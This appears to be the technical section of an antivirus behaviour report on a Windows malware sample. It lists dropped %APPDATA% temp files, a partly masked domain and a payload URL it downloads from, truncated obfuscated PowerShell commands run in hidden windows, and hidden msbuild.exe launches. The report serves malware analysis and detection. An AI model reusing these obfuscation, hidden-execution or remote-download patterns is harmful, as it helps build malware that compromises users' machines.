Technical Information
- %APPDATA%\bit3dab.tmp
- %APPDATA%\bit6854.tmp
- %APPDATA%\bit3dab.tmp
- %APPDATA%\bit6854.tmp
- from %APPDATA%\bit3dab.tmp to %APPDATA%\trachecheae62.tab
- from %APPDATA%\bit6854.tmp to %APPDATA%\trachecheae62.tab
- 'in####aindia.com':80
- http://in####aindia.com/h2o/Skoves.pcx
- DNS ASK in####aindia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function ranier9 ($Rengringerne){$Kbmandsliv = $Rengringerne.Length-1; For ($Bloede=6; $Bloede -lt $Kbmandsliv){$Forkundskabers226=$Forkundskabers226+$Rengringerne.Substring( $Bloede...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe' ' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function ranier9 ($Rengringerne){$Kbmandsliv = $Rengringerne.Length-1; For ($Bloede=6; $Bloede -lt $Kbmandsliv){$Forkundskabers226=$Forkundskabers226+$Rengringerne.Substring( $Bloede...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function ranier9 ($Rengringerne){$Kbmandsliv = $Rengringerne.Length-1; For ($Bloede=6; $Bloede -lt $Kbmandsliv){$Forkundskabers226=$Forkundskabers226+$Rengringerne.Substring( $Bloede...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe'